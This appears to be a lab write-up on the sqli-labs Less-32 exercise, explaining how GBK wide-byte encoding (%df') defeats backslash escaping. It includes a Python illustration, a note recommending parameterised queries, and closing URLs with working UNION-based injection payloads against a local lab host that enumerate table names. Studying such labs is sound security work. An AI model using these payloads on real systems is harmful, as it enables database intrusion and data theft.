The escape function escapes the following characters so that the quotation mark cannot be closed, which prevents injection:
' --> \'
" --> \"
\ --> \\
However, when MySQL's client character set is GBK, wide-byte injection becomes possible; see http://netsecurity.51cto.com/art/201404/435074.htm
%df' --> %df\' = %df%5c'
The quotation mark is therefore closed, because %df%5c is decoded as a single Chinese character and the escaping backslash no longer applies to the quote.
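The following added example (not part of the original post) models the byte-wise filter in Python and shows why it fails once the server decodes the bytes as GBK, next to a charset-aware variant that escapes per character and rejects malformed input. The function names are hypothetical, and the lab's real filter is PHP code that is not shown on this page.

```python
# Added illustration: byte-wise escaping versus a server that decodes GBK.
ESCAPE_BYTES = (0x27, 0x22, 0x5C)  # ' " \  (the three characters listed above)


def byte_escape(raw: bytes) -> bytes:
    """Model of the filter: prefix ' " \\ with a backslash, byte by byte."""
    out = bytearray()
    for b in raw:
        if b in ESCAPE_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def charset_escape(raw: bytes, charset: str = "gbk") -> bytes:
    """Escape per character in the connection charset; malformed input raises."""
    text = raw.decode(charset)  # strict decode: UnicodeDecodeError on bad bytes
    for ch in ("\\", "'", '"'):  # backslash first so added slashes stay single
        text = text.replace(ch, "\\" + ch)
    return text.encode(charset)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count quotes that still end a string literal after the server decodes."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a backslash consumes the character after it
            continue
        if text[i] in "'\"":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    sample = b"1\xdf'"  # constructed input: the id=1%df' value after URL decoding
    escaped = byte_escape(sample)
    print(escaped, "->", escaped.decode("gbk"))
    print("live quotes under latin-1:", unescaped_quotes(escaped, "latin-1"))
    print("live quotes under gbk:    ", unescaped_quotes(escaped, "gbk"))
    try:
        charset_escape(sample, "gbk")
    except UnicodeDecodeError as exc:
        print("charset-aware escape rejects the input:", exc.reason)
```

The durable fix is to bind the value as a query parameter instead of escaping it, with the connection charset set through the driver so that client and server agree on how bytes are decoded.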
Closed successfully
http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df'
http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,3%23
Table name
http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23
"sqli-labs" Less-32: GET - Bypass custom filter adding slashes to dangerous chars (GET-based wide-byte injection where the ' and " characters are escaped)